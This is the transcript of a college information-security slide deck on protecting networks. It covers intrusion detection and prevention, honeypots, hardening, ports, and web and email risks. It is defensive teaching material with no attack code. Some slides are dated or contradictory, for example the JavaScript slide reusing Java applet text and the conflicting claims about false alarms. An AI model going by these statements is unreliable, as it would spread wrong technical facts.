1 / 42

CIST 1601 Information Security Fundamentals

CIST 1601 Information Security Fundamentals. Chapter 3 Protecting Networks. Collected and Compiled By JD Willard MCSE, MCSA, Network+, Microsoft IT Academy Administrator Computer Information Systems Technology Albany Technical College.

rhys
Télécharger la présentation

CIST 1601 Information Security Fundamentals

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. CIST 1601 Information Security Fundamentals Chapter 3 Protecting Networks Collected and Compiled By JD Willard MCSE, MCSA, Network+, Microsoft IT Academy Administrator Computer Information Systems Technology Albany Technical College

  2. Monitoring the Network Recognizing the Different Types of Network Traffic Novell Protocols NetWare, a server-based networking environment/operating system, offers network protocols, services, and applications. NetWare is susceptible to DoS attacks. In addition to TCP/IP, NetWare supports two other proprietary protocols: Internetwork Packet Exchange (IPX) and Sequenced Packet Exchange (SPX) are unique to Novell 4.x and earlier NetWare networks. Since NetWare 5, NetWare has been able to use TCP/IP as its only transport protocol. IPX and SPX are fast, efficient, and well documented. They’re also susceptible to communications interception using internal monitoring. Microsoft created NWLink, an IPX-/SPX-compatible protocol that it owns. NetWare Directory Services (NDS) manages all the resources in a network. NDS provides a database of all network objects or resources.

  3. Monitoring the Network Recognizing the Different Types of Network Traffic The figure below shows an NDS tree. Notice that the NDS tree treats print devices, disk volumes, users, and groups as leaf objects, or resources, in the tree. Earlier versions of NetWare used bindery services; the bindery kept track of resources on a server-by-server basis. In the most recent versions of NetWare, NDS has been expanded and renamed eDirectory.

  4. Monitoring the Network Recognizing the Different Types of Network Traffic Microsoft Protocols NetBIOS The biggest vulnerability with NetBIOS is that it opens ports for file and print sharing. These ports (which can include 135 through 139 and 445) can be accessed across the Internet as well as by devices on the local LAN. NetBEUI NetBEUI is a nonroutable protocol, meaning that it can’t be sent across routers. NetBEUI traffic is easy to intercept internally using a network sniffer. WINS Service Windows Internet Naming Service (WINS) translates NetBIOS names to TCP/IP addresses. Because WINS is providing a service to clients who request information from it, it’s susceptible to DoS attacks. When left unpatched, it is also available for remote code execution. WINS Server Resolving TCP/IP address to NetBIOS Name

  5. Monitoring the Network Recognizing the Different Types of Network Traffic Network File System Protocol Network File System (NFS) is the default file-sharing protocol for Unix systems. NFS allows a remote user to mount drives on a machine in the network. To be secure, NFS requires special configuration. NFS is equivalent to Distributed File System (DFS), which tends to exist outside of the Unix world. The Apple Protocol Most manufacturers support AppleTalk, which isn’t intended for secure applications. Modern Macintosh systems can also use TCP/IP for connections. Most AppleTalk vulnerabilities are exploitations of programs that offer this service. For example, there are known vulnerabilities with programs that allow Linux to offer AppleTalk, but those weaknesses are with the programs themselves and not with AppleTalk per se. A remote system mounting a drive on a local machine using NFS.

  6. Reporting (07:32) Monitoring Network Systems Monitoring can occur on individual systems, on servers, or as a separate component of the network. The connection used is called a tap. The figure below illustrates some of the places where a network tap can occur. Each tap location presents a different view of the network. For effective security, multiple taps are probably needed. Your system faces both internal and external threats. Heavy traffic makes it necessary to dedicate personnel to monitoring. Network activity is also reported in system logs and audit files. It’s a good practice to periodically review these files. Automated tools make this process more manageable. Network sniffers and NIDSs are used to monitor network traffic. Network sniffers are manually oriented, whereas an NIDS can be automated. Tap locations used to monitor network traffic

  7. Monitoring and Diagnosing Networks Network Monitors Network monitors, otherwise called sniffers, were originally introduced to help troubleshoot network problems. Examining the signaling and traffic that occurs on a network requires a network monitor. Network monitors are now available for most environments, and they’re effective and easy to use. Today, a network-monitoring system usually consists of a PC with a NIC (running in promiscuous mode) and monitoring software. Microsoft Network Monitor is a packet analyzer. It enables capturing, viewing, and analyzing network data and deciphering network protocols. It can be used to troubleshoot network problems and applications on the network. The monitoring software is menu driven, easy to use, and has a big help file. The traffic displayed by sniffers can become overly involved and require additional technical materials which you can find on the Internet for free. With a few hours of work, most people can make network monitors work efficiently and use the data they present. Microsoft Network Monitor

  8. Monitoring and Diagnosing Networks Intrusion Detection Systems An IDS and a firewall working together to secure a network An IDS (Intrusion Detection System) is a hardware device with software that monitors events in a system or network to identify when intrusions are taking place. IDS are designed to analyze data, identify attacks, and respond to the intrusion. An IDS can run on network devices and on individual workstations. You can configure the IDS to monitor for suspicious network activity, check systems logs, perform stateful packet matching, and disconnect sessions that are violating your security policy. An IDS is used to protect and report network abnormalities to a network administrator or system. It works with audit files and rule-based processing to determine how to act in the event of an unusual situation on the network. IDSs are different from firewalls in that firewalls control the information that gets in and out of the network, whereas IDSs can identify unauthorized activity. IDSs are also designed to catch attacks in progress within the network, not just on the boundary between private and public networks. If the firewall were compromised, the IDS would notify you based on rules it’s designed to implement. In the event the firewall is compromised or penetrated, the IDS can react by disabling systems, ending sessions, and even potentially shutting down your network. The main types are a host-based IDS system and network IDS system. With a host-based IDS system, software runs on the host computer system to monitor machine logs, system logs, and how applications inter-operate. With a network IDS, the IDS checks for network traffic and traffic patterns that could be indicative of attacks such as port scan and denial-of-service attacks. Log Analysis (2:33)

  9. Detection vs. Prevention (6:06) Understanding Intrusion Detection Systems Network Intrusion Detection and Prevention (5:40) Intrusion detection (ID) is the process of monitoring events in a system or network to determine if an intrusion is occurring. An intrusion is defined as any activity or action that attempts to undermine or compromise the confidentiality, integrity, or availability of resources. An IDS reports and monitors intrusion attempts. An IDS will announce an event through an alert when suspicious activity is encountered.

  10. Understanding Intrusion Detection Systems An activity is an element of a data source that is of interest to the operator. This is usually a specific occurrence or event. The administrator is the person responsible making decisions about, the deployment and configuration of the IDS, alarm levels, historical logging, and session monitoring capabilities, and determining the appropriate responses to attacks and ensuring that those responses are carried out. An alert is the message from an IDS analyzer that indicates something of interest has happened. An alert is a message from the IDS indicating that an event has occurred. Alerts occur when activities of a certain type exceed a preset threshold. The analyzer is the component that analyzes the data collected by the sensor. The analyzer function uses data sources from sensors to analyze and determine whether an attack is under way. The data source is the raw information used by the IDS to detect suspicious activity. Data sources include audit files, system logs, or current network activity. An event is an occurrence in the data source that indicates a suspicious event. Not every activity ends up as an event, and not every event generates an alert. The event might trigger an alert if a deviation from normal network traffic patterns occurred or if an activity threshold was crossed. The manager is the component that the operator uses to manage the IDS. The manager may be a graphical interface, a real-time traffic screen, or a command-line-driven environment. Notification is the process or method by which the IDS manager makes the operator aware of an alert. This might include a graphic display or an e‑mail sent to the administrative staff. The operator is the person primarily responsible for the IDS. A sensor collects data from the data source and passes it on to the analyzer. If the analyzer determines that unusual activity has occurred, an alert may be generated. The components of an IDS working together to provide network monitoring

  11. Understanding Intrusion Detection Systems A signature-based system, also commonly known as misusedetection IDS (MD-IDS), is primarily focused on evaluating attacks based on a known identity, attack signature, or audit trail. All attack signatures are contained in a signature database. The signature database must be updated to remain effective. The user can examine the signature database, and quickly determine which intrusive activity the misuse detection system is programmed to alert on. Signature-based systems have an advantage because of their simplicity and their ability to operate online in real time. Other advantages include: Low number of false positives Detailed text logs Use of few system resources Signature-based detection has several limitations, including being based excessively on passive monitoring and the rule sets need constant updating. They can detect only known attacks with identified signatures. A signature-based IDS in action False Positives (3:23)

  12. Understanding Intrusion Detection Systems Anomaly-detection IDS (AD-IDS) detects any changes or deviations in network traffic. It is also called statistical anomaly detection. Anomaly detection is analogous to credit card fraud detection. Credit card companies maintain “spending profiles” for their customers. Anomaly detectors work by creating profiles or models on the normal behavior pattern of individual users, hosts, or network connections. There is an initial learning period before anomalies can be detected. Once the baselines are established, anomaly-based monitoring can detect anomalies. Sometimes the baseline is established through a manual process. The classifications of anomaly detection techniques include statistical methods, rule-based methods, distance-based methods, profiling methods, and model-based approaches. Anomaly-based monitoring is useful for detecting these types of attacks: Protocol and port exploitation New exploits or buffer overflow attacks DoS attacks based on payloads or volume Normal network failures Variants of existing attacks in new environments Highly secure environments might use complex patterns of behavior analysis, in some cases learning individual patterns of use common to each user profile, so that variations can be identified. One of the disadvantages of anomaly-based IDS is that it generates false positives because the pattern of behavior can vary, or the pattern of behavior is too dynamic to analyze properly. AD-IDS using expert system technology to evaluate risks

  13. Understanding Intrusion Detection Systems Behavior-based monitoring works by looking at the way certain executable files make your computer behave. It determines whether a program is malicious by inspecting the stream of system calls that the program issues to the operating system. This monitoring method can be used to identify internal misuse by recognizing actions outside of normal access patterns or authorized events occurring outside of normal profile usage, such as the access of protected files during off hours. Behavior-based monitoring is not likely to produce a false alert because you defined non-acceptable behavior. Rules must be in place. If you do not properly define inappropriate behaviors, then attacks can occur. When you define a rule that prevents an e-mail client from executing the cmd.exe command and alerts you when this is attempted, you are using behavior-based monitoring. Behavior-based monitoring advantages include the following: It can identify malware before it is added to signature files, monitor for malware activities, and learn about malware based on previous detection. Behavior-based detection has several limitations, including high incidence of false alarms and slow file checking.

  14. Working with a Network-Based IDS The primary advantage of an network-based IDS (N-IDS) is the low maintenance involved in analyzing traffic in the network. An NIDS is easy and economical to manage because the signatures are not configured on all the hosts in a network segment. Violations of policy, monitoring of all HTTP traffic, and monitoring of all FTP traffic are examples of the types of information an NIDS is designed to monitor. An NIDS is not capable of analyzing encrypted information. For example, the packets that travel through a VPN cannot be analyzed by the NIDS. The lack of this capability is a primary disadvantage of an NIDS. The performance of an NIDS can be affected in a switched network environment because the NIDS will not be able to properly analyze all the traffic that occurs on the network on which it does not reside. Two basic types of responses can be formulated at the network level: passive and active.

  15. Working with a Network-Based IDS N-IDS placement in a network determines what data will be analyzed A network-based IDS (N-IDS)approach to IDS attaches the system to a point in the network where it can monitor and report on all network traffic. Placing the N-IDS in front of the firewall provides monitoring of all network traffic going into the network. Putting the N-IDS behind the firewall only allows you to see the traffic that penetrates the firewall. The best solution to creating a secure network is to place IDS in front of and behind the firewall. The N-IDS can be attached to a switch or a hub, or it can be attached to a tap. Intrusion is monitored on the network segment on which the NIDS is placed, and not on individual systems. A hub being used to attach the N-IDS to the network

  16. Implementing a Passive Response A passive response is the most common type of response to many intrusions and the easiest and cheapest to develop and implement. A passive threat response does nothing to prevent the threat or attack, just acknowledges that one is or is about to happen. The following list includes some passive response strategies: Logging involves gathering sufficient information on the attack to assist administrators in implementing measures to divert it. Logging usually involves recording of events and the circumstances under which they occurred. Notification involves informing the designated administrator when a security related event occurred and communicating information on the event. If the IDS is manned full time, messages can be displayed on the manager’s console to indicate that the situation is occurring. Shunning basically involves ignoring the attack because the specific attack will not work. The IDS can make a note of it in a log and move on to other more pressing business.

  17. Implementing an Active Response An active response involves taking an action based on an attack or threat. An active response will include one of the reactions briefly described here: Terminating processes or sessions If a flood attack is detected, the IDS can cause the subsystem, such as TCP, to force resets to all the sessions that are under way. IDS instructing TCP to reset all connections

  18. Implementing an Active Response Network configuration changes If a certain IP address or a particular socket or port is being attacked, the IDS can instruct a border router or firewall to reject any requests or traffic from that address or port. This configuration change can remain in effect permanently or for a specified period. IDS instructing the firewall to close port 80 for 60 seconds to thwart an IIS attack

  19. Implementing an Active Response Deception A deception active response fools the attacker into thinking the attack is succeeding while the system monitors the activity and potentially redirects the attacker to a system that is designed to be broken. This allows the operator or administrator to gather data about how the attack is unfolding and the techniques being used in the attack. This process is referred to as sending them to the honeypot. It’s dangerous to allow a hacker to proceed into your network, even if you’re monitoring the events. This approach is frequently used when law enforcement is gathering evidence to ensure a successful prosecution of the attacker. A network honeypot deceives an attacker and gathers intelligence

  20. Working with a Host-Based IDS A Host Intrusion Detection System (HIDS) is designed to detect hacker attacks on a single computer system. HIDS software is installed on each host that needs IDS capabilities. Because the HIDS is installed on the local computer, the computer is completely compromised once a hacker penetrates the HIDS software. HIDS can monitor: Network traffic specific to the host Checksums of important system files Ports used by the system or incoming connections Processes running on the system HIDS can include filters and antivirus modules. HIDSs are good at detecting unauthorized file modifications and user activity. HIDS runs on a host in the network to: Monitor communications Monitor system logs and file systems Detect suspicious activities, including failed login attempts A host-based IDS cannot see information within encrypted tunnels. To monitor the internal network and external traffic the NIDSs and HIDs should be used together. A host-based IDS interacting with the operating system

  21. Working with NIPS A network intrusion prevention system (NIPS) detects network intrusion attempts and controls access to the network for the intruders. A NIPS is an improvement over an IDS because an IPS actually prevents intrusion. An inline NIPS works like a Layer 2 bridge. It sits between the systems that need to be protected and the rest of the network. NIPS proactively protect machines against damage from attacks that signature-based technologies cannot detect, as most NIPS solutions have the ability to look at application layer protocols such as HTTP, FTP, and SMTP. When implementing a NIPS, keep in mind that the sensors must be physically inline to function properly. This adds single point of failure to the network. A good way to prevent this issue is to use fail-open technology. This means that if the device fails, it does not cause a complete network outage; instead, it acts like a patch cable.

  22. Utilizing Honeypots Honeypots are computer systems designed to be vulnerable points of attack on a separate network away from the corporate network. Honeypots lure a hacker by appearing to be a legitimate server with security holes that are ripe and ready for exploitation. A honeypot simulates a network of vulnerable devices, and have logging and tracing enabled. To attract hackers, a honeypot has its security level purposefully set quite low, so as to draw attackers to it, and divert them from the private network. This security technique is used to allow administrators to observe hackers in action while not exposing vital network resources. Law enforcement agencies use honeypots to gather evidence for prosecution. A honeypot is most often deployed on the DMZ or screened subnet. When compared to IDSs and firewalls, honeypots are usually easier to configure and monitor. In addition to this, IDSs and firewalls collect vast quantities of information while honeypots provide valuable information on only the specific attack. Before implementing a honeypot, you need to understand the concepts of enticement and entrapment: Enticement is the process of luring someone into your plan or trap. You might accomplish this by advertising that you have free software, or you might brag that no one can break into your machine. If you invite someone to try, you’re enticing them to do something that you want them to do. Entrapment is the process of encouraging an individual to perform an unlawful act that they wouldn’t normally have performed. While enticement is legally acceptable, entrapment isn’t. You should seek legal advice before you implement a honeypot on your network.

  23. Understanding Protocol Analyzers Protocol Analyzers (2:35) A protocol analyzer provides information regarding traffic flow and statistical information for your network. It is used to capture network traffic and generate statistics for creating reports. A protocol analyzer is a software utility used on a hub, a switch supervisory port, or inline with network connectivity to allow the analysis of network communications. Individual protocols, specific endpoints, or sequential access attempts may be identified using this utility. A protocol analyzer is also referred to as a network analyzer or packet sniffer. Windows Server operating systems come with a protocol analyzer called Network Monitor.

  24. Securing Workstations and Servers Workstations are particularly vulnerable in a network. Workstations communicate using services such as file sharing, network services, and applications programs. Many of these programs have the ability to connect to other workstations or servers. These connections are potentially vulnerable to interception and exploitation. The process of making a workstation or a server more secure is called platform hardening. The process of hardening the operating system is referred to as OS hardening. Platform hardening procedures can be categorized into three basic areas: Remove unused software, services, and processes from the workstations (for example, remove the server service from a workstation). These services and processes may create opportunities for exploitation. Ensure that all services and applications are up-to-date, including available service and security packs, and configured in the most secure manner allowed. This may include assigning passwords, limiting access, and restricting capabilities. Minimize information dissemination about the operating system, services, and capabilities of the system. Many attacks can be targeted at specific platforms once the platform has been identified. Many operating systems use default account names for administrative access. If at all possible, these should be changed. During a new installation of Windows Vista or Windows XP, the first user created is automatically added to the administrators group. Windows Vista then goes one step further and automatically disables the actual administrator account once another account belonging to the administrators group has been created.

  25. Securing Internet Connections Working with Ports and Sockets TCP/IP establishes connections and circuits using a combination of the IP address and a port. A port is an interface that is used to connect to a device. Sockets are a combination of the IP address and the port. The socket identifies which application will respond to the network request. For example, if you attempt to connect to a remote system with the IP address 192.168.0.100, which is running a website, you’ll use port 80 by default. The combination of these two elements gives you a socket; 192.168.0.100:80. IP is used to route the information through the network. The four layers of TCP/IP encapsulate the information into a valid IP packet that is then transmitted across the network. The figure to the right illustrates the key components of a TCP packet requesting the home page of a website. The destination port is the port data is sent to. In the case of a web application, the data for port addresses would both contain 80. The data field contains the value Get/. This value requests the home or starting page from the web server. In essence, this command or process requested the home page of the site 192.168.0.100 port 80. The data is formed into another data packet that is passed down to IP and sent back to the originating system on port 1024. The connections to most services using TCP/IP are based on this port model.

  26. Securing Internet Connections Working with E-Mail The most common e‑mail systems use the following protocols, which use TCP for session establishment: Simple Mail Transport Protocol SMTP is a mail delivery protocol that is used to send e‑mail between an e‑mail client and an e‑mail server as well as between e‑mail servers. SMTP uses port 25. Post Office Protocol POP is a newer protocol that relies on SMTP for message transfer to receive e‑mail. POP3, the newest version of POP, allows messages to be transferred from the waiting post office to the e‑mail client. The current POP3 standard uses port 110. Internet Message Access Protocol IMAP is the newest player in the e‑mail field, and it’s rapidly becoming the most popular. Like POP, IMAP has a store-and-forward capability. IMAP allows messages to be stored on an e‑mail server instead of being downloaded to the client. It also allows messages to be downloaded based on search criteria. The current version IMAP 4 uses port 143. Each of these web services is offered in conjunction with web-enabled programs such as Flash and Java. These services use either a socket to communicate or a program that responds to commands through the browser. If your browser can be controlled by an application, your system is at great risk of attack. Servers are also vulnerable to this issue because they must process requests from browsers for information or data. The process of transferring an e‑mail message.

  27. Securing Internet Connections Working with the Web There are two common ways to provide secure connections between a web client and a web server: Secure Sockets Layer (SSL) and Transport Layer Security (TLS) are the most widely used cryptographic protocols used to convey information between a web client and a server. The SSL protocol uses an encryption scheme between the two systems. The client initiates the session, the server responds, indicating that encryption is needed, and then they negotiate an appropriate encryption scheme. TLS is a newer protocol that merges SSL with other protocols to provide encryption. TLS supports SSL connections for compatibility, but it also allows other encryption protocols, such as Triple DES, to be used. SSL/TLS uses port 443 and TCP for connections. HTTP Secure (HTTP/S) is a protocol that is used for secure connections between two systems that use the Web. It protects the connection, and all traffic between the two systems is encrypted. HTTP/S uses SSL or TLS for connection security, and it uses port 443 and TCP for connections.

  28. Working with the Web ActiveX ActiveX is a technology that was implemented by Microsoft. ActiveX allows customized controls, icons, and other features to increase the usability of web enabled systems. ActiveX uses a method called authenticode for security. Authenticode is a type of certificate technology that allows ActiveX components to be validated by a server. ActiveX runs on the client. Web browsers can be configured so that they require confirmation to accept an ActiveX control. However, many users don’t understand these confirmation messages when they appear, and they automatically accept the components. Automatically accepting an ActiveX component or control creates the opportunity for security breaches on a client system when the control is used because an ActiveX control contains programming instructions that can contain malicious code or create vulnerabilities in a system.

  29. Working with the Web Buffer Overflows Perhaps the most popular method of privilege escalation is a buffer-overflow attack. Buffer overflows cause disruption of service and lost data. Buffer overflows occur when an application receives more data than it is programmed to accept. This situation can cause: An application to terminate. The termination may leave the system sending the data with temporary access to privileged levels in the attacked system. The overwriting of data or memory storage. A denial of service due to overloading the input buffer’s ability to cope with the additional data. Or the originator can execute arbitrary code, often at a privileged level. A buffer overflow is targeted toward an individual machine.

  30. Working with the Web Common Gateway Interface Common Gateway Interface (CGI) is an older form of scripting that was used extensively in early web systems. CGI scripts could be used to capture data from a user using simple forms. CGI scripts are not widely used in new systems and are being replaced by Java, ActiveX, and other technologies. The CGI script ran on the web server, and it interacted with the client browser. Vulnerabilities in CGI are the result of its inherent ability to do what it is told. If a CGI script is written to wreak havoc (or carries extra code added to it by a miscreant) and it is executed, your systems will suffer. The best protection against any weaknesses is to not run applications written in CGI.

  31. Working with the Web Cookies Cookies are text files that a browser maintains on the user's hard disk. They store information on a Web client for future sessions with a Web server. A cookie will typically contain information about the user. It is used to provide a persistent, customized Web experience for each visit and to track a user’s browser habits. A cookie can contain the history of a client to improve customer service. A tracking cookie is a particular type of permanent cookie that stays around, whereas a session cookie stays around only for the particular visit to a web-site. The danger to maintaining session information is that sites may access cookies stored in the browser’s cache that may contain sensitive information identifying the user or allowing access to secured sites. The information stored in a cookie is not typically encrypted and might be vulnerable to hacker attacks. The best protection is to not allow cookies to be accepted. Almost every browser offers the option to enable or disable cookies. If you enable them, you can usually choose whether to accept/reject all or only those from an originating server.

  32. Cross-site Scripting (12:36) Working with the Web Cross-site scripting (XSS) Cross-site scripting (XSS) is when a website redirects the client’s browser to attack yet another site. XSS is a type of security vulnerability typically found in Web applications that allows code injection by hackers into the Web pages viewed by other users. It is used to trick a user into visiting a site and having code execute locally. XSS poses the most danger when a user accesses a financial organization’s site using his or her login credentials. The problem is not that the hacker will take over the server. It is more likely that the hacker will take over the client’s session. This will allow the hacker to gain information about the legitimate user that is not publicly available. The best protection against cross-site scripting is to disable the running of scripts.

  33. Working with the Web Input Validation Anytime a user must supply values in a session, validation of the data entered should be done. Many vendors, however, have fallen prey to input validation vulnerabilities within their code. In some instances, empty values have been accepted, while others have allowed privilege escalation if certain backdoor passwords were used. The best protection against input validation vulnerabilities is for developers to follow best practices and always validate all values entered. As an administrator, when you learn of an input validation vulnerability with any application on your system, you should immediately stop using it until a patch has been released and installed.

  34. Working with the Web Java Applets A Java applet is a small, self-contained Java script that is downloaded from a server to a client and then run from the browser. The client browser must have the ability to run Java applets in a virtual machine on the client. Java applets are used extensively in web servers today, and they are popular tools used for website development. Signed applets are similar to unsigned Java applets-with one key difference: Unsigned Java applets use sandboxes to enforce security. A sandbox protects the system from malicious software by enforcing the execution of the application within the sandbox and preventing access to the system resources outside the sandbox. The concept of a Web script that runs in its own environment and cannot interfere with any other process is known as a sandbox. A signed applet does not run in the Java sandbox, and it has higher system access capabilities. Signed applets are not usually downloaded from the Internet. This type of applet is usually provided by in-house or custom-programming efforts. These applets can also include a digital signature to verify authenticity. If the applet is verified as authentic, it will be installed. Users should never download a signed applet unless they are sure that the provider is trusted. Errors in the Java virtual machine that runs in the applications may allow some applets to run outside of the sandbox. When this occurs, the applet is unsafe and may perform malicious operations. From a user’s standpoint, the best defense is to make certain you run only applets from reputable sites you’re familiar with. From an administrator’s standpoint, you should make certain programmers adhere to programming guidelines when creating the applets.

  35. Working with the Web JavaScript JavaScript is a programming language that allows access to the system resources of the system running the script. These scripts can interface with all aspects of an operating system just like programming languages, such as the C language. This means that JavaScript scripts, when executed, can potentially damage systems or be used to send information to unauthorized persons. JavaScript scripts can be downloaded from a website to a client and executed within a Web browser. The client browser must have the ability to run Java applets in a virtual machine on the client. Java applets are used extensively in web servers today, and they are becoming one of the most popular tools used for website development.

  36. Working with the Web Popups A Popup occurs when a Web site is opened in the foreground. Popups are an annoyance, and some can contain inappropriate content or entice the user to download malware. Some popup blockers may delete the information already entered by reloading the page, causing the users unnecessary grief. Many popup blockers are integrated into vendor toolbars. Field help for fill-in forms is often in the form of a popup. A Popunder occurs when a Web site is opened in the background. Popunders are in the same family as popups and should be prevented by enabling a popup blocker on the user’s computer. You can adjust the settings on popup blockers to meet the organizational policy or to best protect the user environment: High settings might prevent application or program installation. Medium will block most automatic popups but still allow functionality. You can circumvent popup blockers in various ways: Most popup blockers block only the JavaScript; therefore, technologies such as Flash bypass the popup blocker. On many Internet browsers, holding down the Ctrl key while clicking a link will allow it to bypass the popup filter.

  37. Working with the WebSigned Applets Signed applets are similar to Java applets, with two key differences: A signed applet doesn’t run in the Java sandbox It has higher system access capabilities Signed applets are typically provided by in-house or custom-programming efforts. They can also contain a digital signature to verify authenticity. If the applet is verified as authentic, it will be installed. Users should never download a signed applet unless they’re sure the provider is trusted. Most web browsers have settings that can be used to control Java access. This allows clients to control resource access using Java applets or scripts.

  38. Working with the Web SMTP Relay SMTP relay is a feature designed into many e-mail servers that allows them to forward e-mail to other e-mail servers. The main purpose of implementing an e-mail relay server is to protect the primary e-mail server by reducing the effects of viruses and port scan attacks. Initially, the SMTP relay function was intended to help bridge between systems. This capability allows e-mail connections between systems across the Internet to be made easily. Unfortunately, this feature has been used to generate a great deal of spam on the Internet. You should configure your e-mail server to prevent e-mail relay because e-mail relay can result in untraceable, unwanted, unsolicited e-mail messages being sent.

  39. Working with File Transfer Protocol FTP servers provide user access to upload or download files between client systems and a networked FTP server. FTP servers include many potential security issues, including anonymous file access and unencrypted authentication. FTP has three separate functions. FTP is a protocol, a client, and a server. The client system runs a program called FTP. The server runs a service called FTP server. The FTP client and server communicate using the FTP protocol. The client requests a connection to a server that runs the FTP service. The client and server communicate using a protocol that defines the command structure and interactions between the client and server. Early FTP servers based security on the honor system. Most logons to an FTP site used the anonymous logon, conventionally, the user's e-mail address, and the password was anonymous. In this situation, the only security offered is what is configured by the operating system. The major security vulnerability of FTP is that the user ID and password are not encrypted and is sent in clear text. This allows it to be subject to packet capture; a major security breach-especially if you are connecting to an FTP server across the Internet. The only protection is to implement Secure FTP (SFTP) or to implement FTP with Transport Layer Security (TLS) or Secure Sockets Layer (SSL). Secure FTP (SFTP) is accomplished using a protocol called Secure Shell (SSH).

  40. ICMP and SNMP (4:39) Understanding Network Protocols Simple Network Management Protocol (SNMP) is used to monitor network devices. SNMP is used for monitoring the health of network equipment, computer equipment, and devices like UPS. It uses port 161 to communicate. Internet Control Message Protocol (ICMP) is used for destination and error reporting functions in TCP/IP. ICMP is routable and is used by programs such as Ping and Traceroute. ICMP is used for carrying error, control and informational packets between hosts. ICMP is one of the favorite protocols used for DoS attacks. You can disable ICMP through the router to prevent these types of situations from occurring. Internet Group Management Protocol (IGMP) is used for group messaging and multicasting. IGMP maintains a list of systems that belong to a message group. When a message is sent to a particular group, each system receives an individual copy. Multicasting, can consume huge amounts of bandwidth in a network and possibly create a DoS situation. Most network administrators disable the reception of broadcast and multicast traffic from outside their local network.

  41. The End

More Related